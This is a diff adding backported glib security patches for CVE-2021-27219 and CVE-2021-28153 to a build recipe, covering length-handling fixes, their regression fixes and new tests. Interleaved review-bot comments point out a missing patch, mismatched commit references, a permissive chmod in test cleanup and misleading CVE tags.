+ gio/gtlspassword.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index 1e437a7b6..dbcec41a8 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -23,6 +23,7 @@
+ #include "glibintl.h"
+
+ #include "gioenumtypes.h"
++#include "gstrfuncsprivate.h"
+ #include "gtlspassword.h"
+
+ #include <string.h>
+@@ -287,9 +288,14 @@ g_tls_password_set_value (GTlsPassword *password,
+ g_return_if_fail (G_IS_TLS_PASSWORD (password));
+
+ if (length < 0)
+- length = strlen ((gchar *)value);
++ {
++ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
++ gsize length_unsigned = strlen ((gchar *) value);
++ g_return_if_fail (length_unsigned > G_MAXSSIZE);
++ length = (gssize) length_unsigned;
++ }
+
+- g_tls_password_set_value_full (password, g_memdup (value, length), length, g_free);
++ g_tls_password_set_value_full (password, g_memdup2 (value, (gsize) length), length, g_free);
+ }
+
+ /**
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
new file mode 100644
index 0000000000..a620a49269
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
@@ -0,0 +1,63 @@
+From ecdf91400e9a538695a0895b95ad7e8abcdf1749 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:09:40 +0000
+Subject: [PATCH 11/11] giochannel: Forbid very long line terminator strings
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `GIOChannel.line_term_len` is only a `guint`. Ensure that
+nul-terminated strings passed to `g_io_channel_set_line_term()` can’t
+exceed that length. Use `g_memdup2()` to avoid a warning (`g_memdup()`
+is due to be deprecated), but not to avoid a bug, since it’s also
+limited to `G_MAXUINT`.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c6a89d6e0..4dec20f77 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -887,16 +887,25 @@ g_io_channel_set_line_term (GIOChannel *channel,
+ const gchar *line_term,
+ gint length)
+ {
++ guint length_unsigned;
++
+ g_return_if_fail (channel != NULL);
+ g_return_if_fail (line_term == NULL || length != 0); /* Disallow "" */
+
+ if (line_term == NULL)
+- length = 0;
+- else if (length < 0)
+- length = strlen (line_term);
++ length_unsigned = 0;
++ else if (length >= 0)
++ length_unsigned = (guint) length;
++ else
++ {
++ /* FIXME: We’re constrained by line_term_len being a guint here */
++ gsize length_size = strlen (line_term);
++ g_return_if_fail (length_size > G_MAXUINT);
++ length_unsigned = (guint) length_size;
++ }
+
+ g_free (channel->line_term);
+- channel->line_term = line_term ? g_memdup (line_term, length) : NULL;
++ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+ channel->line_term_len = length;
+ }
+
+--
+GitLab
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
new file mode 100644
index 0000000000..3047062f54
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
@@ -0,0 +1,36 @@
+From f8273b9aded135fe07094faebd527e43851aaf6e Mon Sep 17 00:00:00 2001
+From: "Jan Alexander Steffens (heftig)" <jan.steffens@gmail.com>
+Date: Sun, 7 Feb 2021 23:32:40 +0100
+Subject: [PATCH 1/5] giochannel: Fix length_size bounds check
+
+The inverted condition is an obvious error introduced by ecdf91400e9a.
+
+Fixes https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+
+(cherry picked from commit a149bf2f9030168051942124536e303af8ba6176)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index 4dec20f77..c3f3102ff 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -896,7 +896,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
+ {
+ /* FIXME: We’re constrained by line_term_len being a guint here */
+ gsize length_size = strlen (line_term);
+- g_return_if_fail (length_size > G_MAXUINT);
++ g_return_if_fail (length_size <= G_MAXUINT);
+ length_unsigned = (guint) length_size;
+ }
+
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
new file mode 100644
index 0000000000..2ba26075df
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
@@ -0,0 +1,38 @@
+From e069c50467712e6d607822afd6b6c15c2c343dff Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:34:50 +0000
+Subject: [PATCH 2/5] giochannel: Don't store negative line_term_len in
+ GIOChannel struct
+
+Adding test coverage indicated that this was another bug in 0cc11f74.
+
+Fixes: 0cc11f74 "giochannel: Forbid very long line terminator strings"
+Resolves: https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 5dc8b0014c03e7491d93b90275ab442e888a9628)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c3f3102ff..19bb06ba6 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -902,7 +902,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
+
+ g_free (channel->line_term);
+ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+- channel->line_term_len = length;
++ channel->line_term_len = length_unsigned;
+ }
+
+ /**
+--
+GitLab
+
+
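Review bot: The test coverage that this message credits with finding the bug is not part of the series. The regression patches added here are reg1-1, reg1-2, reg1-4 and reg1-5, with subjects `[PATCH 1/5]`, `2/5`, `4/5` and `5/5`, so 3/5 is missing. If 3/5 is the giochannel test, then the `line_term_len` fix here and the bounds-check fix in reg1-1 land without a regression test in this recipe. I would either add it as CVE-2021-27219-reg1-3.patch or state in the header why it was left out.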
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
new file mode 100644
index 0000000000..2c388b4bbb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
@@ -0,0 +1,38 @@
+From 4506d1859a863087598c8d122740bae25b65b099 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:04:48 +0000
+Subject: [PATCH 4/5] gtlspassword: Fix inverted assertion
+
+The intention here was to assert that the length of the password fits
+in a gssize. Passwords more than half the size of virtual memory are
+probably excessive.
+
+Fixes: a8b204ff "gtlspassword: Forbid very long TLS passwords"
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 61bb52ec42de1082bfb06ce1c737fc295bfe60b8)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gtlspassword.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index dbcec41a8..bd86a6dfe 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -291,7 +291,7 @@ g_tls_password_set_value (GTlsPassword *password,
+ {
+ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
+ gsize length_unsigned = strlen ((gchar *) value);
+- g_return_if_fail (length_unsigned > G_MAXSSIZE);
++ g_return_if_fail (length_unsigned <= G_MAXSSIZE);
+ length = (gssize) length_unsigned;
+ }
+
+--
+GitLab
+
+
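Review bot: The `Fixes: a8b204ff` reference cannot be matched against this series, where the patch being corrected is CVE-2021-27219-10.patch with `From 777b95a8`; the hash in the message presumably names the same change on another upstream branch. The same applies to `Fixes: 0cc11f74` in reg1-2 and to commit 7781a9cb cited in reg2-1. A line next to `Upstream-Status:` naming the local file, e.g. `Comment: corrects CVE-2021-27219-10.patch`, would let an auditor pair each regression fix with the patch it repairs.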
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
new file mode 100644
index 0000000000..356e986fe0
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
@@ -0,0 +1,100 @@
+From 3d1550354c3c6a8491c39881752d51cb7515f2c2 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:22:39 +0000
+Subject: [PATCH 5/5] tls-interaction: Add test coverage for various ways to
+ set the password
+
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit df4501316ca3903072400504a5ea76498db19538)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/tls-interaction.c | 55 +++++++++++++++++++++++++++++++++++++
+ 1 file changed, 55 insertions(+)
+
+diff --git a/gio/tests/tls-interaction.c b/gio/tests/tls-interaction.c
+index 4f0737d7e..5661e8e0d 100644
+--- a/gio/tests/tls-interaction.c
++++ b/gio/tests/tls-interaction.c
+@@ -174,6 +174,38 @@ test_interaction_ask_password_finish_failure (GTlsInteraction *interaction,
+ }
+
+
++/* Return a copy of @str that is allocated in a silly way, to exercise
++ * custom free-functions. The returned pointer points to a copy of @str
++ * in a buffer of the form "BEFORE \0 str \0 AFTER". */
++static guchar *
++special_dup (const char *str)
++{
++ GString *buf = g_string_new ("BEFORE");
++ guchar *ret;
++
++ g_string_append_c (buf, '\0');
++ g_string_append (buf, str);
++ g_string_append_c (buf, '\0');
++ g_string_append (buf, "AFTER");
++ ret = (guchar *) g_string_free (buf, FALSE);
++ return ret + strlen ("BEFORE") + 1;
++}
++
++
++/* Free a copy of @str that was made with special_dup(), after asserting
++ * that it has not been corrupted. */
++static void
++special_free (gpointer p)
++{
++ gchar *s = p;
++ gchar *buf = s - strlen ("BEFORE") - 1;
++
++ g_assert_cmpstr (buf, ==, "BEFORE");
++ g_assert_cmpstr (s + strlen (s) + 1, ==, "AFTER");
++ g_free (buf);
++}
++
++
+ static GTlsInteractionResult
+ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ GTlsPassword *password,
+@@ -181,6 +213,8 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ GError **error)
+ {
+ TestInteraction *self;
++ const guchar *value;
++ gsize len;
+
+ g_assert (TEST_IS_INTERACTION (interaction));
+ self = TEST_INTERACTION (interaction);
+@@ -192,6 +226,27 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ g_assert (error != NULL);
+ g_assert (*error == NULL);
+
++ /* Exercise different ways to set the value */
++ g_tls_password_set_value (password, (const guchar *) "foo", 4);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "foo", 4);
++
++ g_tls_password_set_value (password, (const guchar *) "bar", -1);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "bar", 3);
++
++ g_tls_password_set_value_full (password, special_dup ("baa"), 4, special_free);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "baa", 4);
++
++ g_tls_password_set_value_full (password, special_dup ("baz"), -1, special_free);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "baz", 3);
++
+ /* Don't do this in real life. Include a null terminator for testing */
+ g_tls_password_set_value (password, (const guchar *)"the password", 13);
+ return G_TLS_INTERACTION_HANDLED;
+--
+GitLab
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
new file mode 100644
index 0000000000..dd43689aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
@@ -0,0 +1,49 @@
+From cb9ee701ef46c1819eed4e2a4dc181682bdfc176 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:16:39 +0000
+Subject: [PATCH 1/3] gkeyfilesettingsbackend: Fix basename handling when group
+ is unset
+
+Fix an effective regression in commit
+7781a9cbd2fd0aa84bee0f4eee88470640ff6706, which happens when
+`convert_path()` is called with a `key` which contains no slashes. In
+that case, the `key` is entirely the `basename`.
+
+Prior to commit 7781a9cb, the code worked through a fluke of `i == -1`
+cancelling out with the various additions in the `g_memdup()` call, and
+effectively resulting in `g_strdup (key)`.
+
+Spotted by Guido Berhoerster.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 25b057672..861c3a661 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -185,7 +185,12 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ }
+
+ if (basename)
+- *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++ {
++ if (last_slash != NULL)
++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++ else
++ *basename = g_strdup (key);
++ }
+
+ return TRUE;
+ }
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
new file mode 100644
index 0000000000..04503641c3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
@@ -0,0 +1,43 @@
+From 31e0d403ba635dbbacbfbff74295e5db02558d76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:19:30 +0000
+Subject: [PATCH 2/3] gkeyfilesettingsbackend: Disallow empty key or group
+ names
+
+These should never have been allowed; they will result in precondition
+failures from the `GKeyFile` later on in the code.
+
+A test will be added for this shortly.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 861c3a661..de216e615 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -158,6 +158,13 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+
+ last_slash = strrchr (key, '/');
+
++ /* Disallow empty group names or key names */
++ if (key_len == 0 ||
++ (last_slash != NULL &&
++ (*(last_slash + 1) == '\0' ||
++ last_slash == key)))
++ return FALSE;
++
+ if (kfsb->root_group)
+ {
+ /* if a root_group was specified, make sure the user hasn't given
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
new file mode 100644
index 0000000000..65f59287a8
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
@@ -0,0 +1,232 @@
+Backport of:
+
+From 221c26685354dea2b2732df94404e8e5e77a1591 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:21:36 +0000
+Subject: [PATCH 3/3] tests: Add tests for key name handling in the keyfile
+ backend
+
+This tests the two recent commits.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/gsettings.c | 170 +++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 169 insertions(+), 1 deletion(-)
+
+--- a/gio/tests/gsettings.c
++++ b/gio/tests/gsettings.c
+@@ -1,3 +1,4 @@
++#include <errno.h>
+ #include <stdlib.h>
+ #include <locale.h>
+ #include <libintl.h>
+@@ -1740,6 +1741,14 @@ key_changed_cb (GSettings *settings, con
+ (*b) = TRUE;
+ }
+
++typedef struct
++{
++ const gchar *path;
++ const gchar *root_group;
++ const gchar *keyfile_group;
++ const gchar *root_path;
++} KeyfileTestData;
++
+ /*
+ * Test that using a keyfile works
+ */
+@@ -1834,7 +1843,11 @@ test_keyfile (Fixture *fixture,
+ g_free (str);
+
+ g_settings_set (settings, "farewell", "s", "cheerio");
+-
++
++ /* Check that empty keys/groups are not allowed. */
++ g_assert_false (g_settings_is_writable (settings, ""));
++ g_assert_false (g_settings_is_writable (settings, "/"));
++
+ /* When executing as root, changing the mode of the keyfile will have
+ * no effect on the writability of the settings.
+ */
+@@ -1866,6 +1879,149 @@ test_keyfile (Fixture *fixture,
+ g_free (keyfile_path);
+ }
+
++/*
++ * Test that using a keyfile works with a schema with no path set.
++ */
++static void
++test_keyfile_no_path (Fixture *fixture,
++ gconstpointer user_data)
++{
++ const KeyfileTestData *test_data = user_data;
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ GKeyFile *keyfile;
++ gboolean writable;
++ gchar *key = NULL;
++ GError *error = NULL;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, test_data->root_path, test_data->root_group);
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, test_data->path);
++ g_object_unref (kf_backend);
++
++ g_settings_reset (settings, "test-boolean");
++ g_assert_true (g_settings_get_boolean (settings, "test-boolean"));
++
++ writable = g_settings_is_writable (settings, "test-boolean");
++ g_assert_true (writable);
++ g_settings_set (settings, "test-boolean", "b", FALSE);
++
++ g_assert_false (g_settings_get_boolean (settings, "test-boolean"));
++
++ g_settings_delay (settings);
++ g_settings_set (settings, "test-boolean", "b", TRUE);
++ g_settings_apply (settings);
++
++ keyfile = g_key_file_new ();
++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++ g_assert_true (g_key_file_get_boolean (keyfile, test_data->keyfile_group, "test-boolean", NULL));
++
++ g_key_file_free (keyfile);
++
++ g_settings_reset (settings, "test-boolean");
++ g_settings_apply (settings);
++ keyfile = g_key_file_new ();
++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++ g_assert_false (g_key_file_get_string (keyfile, test_data->keyfile_group, "test-boolean", &error));
++ g_assert_error (error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND);
++ g_clear_error (&error);
++
++ /* Check that empty keys/groups are not allowed. */
++ g_assert_false (g_settings_is_writable (settings, ""));
++ g_assert_false (g_settings_is_writable (settings, "/"));
++
++ /* Keys which ghost the root group name are not allowed. This can only be
++ * tested when the path is `/` as otherwise it acts as a prefix and prevents
++ * any ghosting. */
++ if (g_str_equal (test_data->path, "/"))
++ {
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "/");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "test-boolean");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++ }
++
++ g_key_file_free (keyfile);
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. */
++ g_assert_cmpint (g_chmod (keyfile_path, 0777) == 0 ? 0 : errno, ==, 0);
++ g_assert_cmpint (g_remove (store_path) == 0 ? 0 : errno, ==, 0);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys outside its root path.
++ */
++static void
++test_keyfile_outside_root_path (Fixture *fixture,
++ gconstpointer user_data)
++{
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, "/tests/basic-types/", "root");
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/tests/");
++ g_object_unref (kf_backend);
++
++ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++ * don’t error on failure. */
++ g_remove (store_path);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys in the root if no root group is set.
++ */
++static void
++test_keyfile_no_root_group (Fixture *fixture,
++ gconstpointer user_data)
++{
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, "/", NULL);
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/");
++ g_object_unref (kf_backend);
++
++ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++ g_assert_true (g_settings_is_writable (settings, "child/test-boolean"));
++
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++ * don’t error on failure. */
++ g_remove (store_path);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
+ /* Test that getting child schemas works
+ */
+ static void
+@@ -2844,6 +3000,14 @@ main (int argc, char *argv[])
+ gchar *override_text;
+ gchar *enums;
+ gint result;
++ const KeyfileTestData keyfile_test_data_explicit_path = { "/tests/", "root", "tests", "/" };
++ const KeyfileTestData keyfile_test_data_empty_path = { "/", "root", "root", "/" };
++ const KeyfileTestData keyfile_test_data_long_path = {
++ "/tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch/",
++ "root",
++ "tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch",
++ "/"
++ };
+
+ /* Meson build sets this */
+ #ifdef TEST_LOCALE_PATH
+@@ -2967,6 +3131,11 @@ main (int argc, char *argv[])
+ }
+
+ g_test_add ("/gsettings/keyfile", Fixture, NULL, setup, test_keyfile, teardown);
++ g_test_add ("/gsettings/keyfile/explicit-path", Fixture, &keyfile_test_data_explicit_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/empty-path", Fixture, &keyfile_test_data_empty_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/long-path", Fixture, &keyfile_test_data_long_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/outside-root-path", Fixture, NULL, setup, test_keyfile_outside_root_path, teardown);
++ g_test_add ("/gsettings/keyfile/no-root-group", Fixture, NULL, setup, test_keyfile_no_root_group, teardown);
+ g_test_add_func ("/gsettings/child-schema", test_child_schema);
+ g_test_add_func ("/gsettings/strinfo", test_strinfo);
+ g_test_add_func ("/gsettings/enums", test_enums);
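Review bot: The cleanup in `test_keyfile_no_path` calls `g_chmod (keyfile_path, 0777)`, but nothing in that function restricts the directory mode beforehand, so the call only makes the temporary directory world-writable just before it is removed. It looks carried over from `test_keyfile`, whose context comment in this patch talks about changing the keyfile's mode. I would drop the line or keep it owner-only, `g_assert_cmpint (g_chmod (keyfile_path, 0700) == 0 ? 0 : errno, ==, 0);`. As this is a backport, the change is probably best raised upstream so the patch keeps matching its source.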
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
new file mode 100644
index 0000000000..c89ca20726
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
@@ -0,0 +1,27 @@
+From 78420a75aeb70569a8cd79fa0fea7b786b6f785f Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:33:38 +0000
+Subject: [PATCH 1/5] glocalfileoutputstream: Fix a typo in a comment
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -851,7 +851,7 @@ handle_overwrite_open (const char *fi
+ mode = mode_from_flags_or_info (flags, reference_info);
+
+ /* We only need read access to the original file if we are creating a backup.
+- * We also add O_CREATE to avoid a race if the file was just removed */
++ * We also add O_CREAT to avoid a race if the file was just removed */
+ if (create_backup || readable)
+ open_flags = O_RDWR | O_CREAT | O_BINARY;
+ else
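Review bot: The header of this patch carries `CVE: CVE-2021-28153`, yet its only change is a comment typo (`O_CREATE` to `O_CREAT`). Tooling that treats a `CVE:` tag in an applied patch as evidence of a fix (OE's cve-check does this, as far as I know) would keep reporting the CVE as patched even if CVE-2021-28153-4.patch, which holds the actual symlink fix, were dropped or failed to apply. CVE-2021-28153-2, -3 and -5.patch are in the same position by their own descriptions: test housekeeping, a refactor with no functional changes, and an added O_CLOEXEC flag. If they are carried only so that patch 4 applies, I would say so in the header, for example `Prerequisite for CVE-2021-28153-4.patch; does not fix the CVE by itself`, and consider keeping the `CVE:` tag on patch 4 only.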
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
new file mode 100644
index 0000000000..8a35bab4de
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
@@ -0,0 +1,42 @@
+From 32d3d02a50e7dcec5f4cf7908e7ac88d575d8fc5 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:34:32 +0000
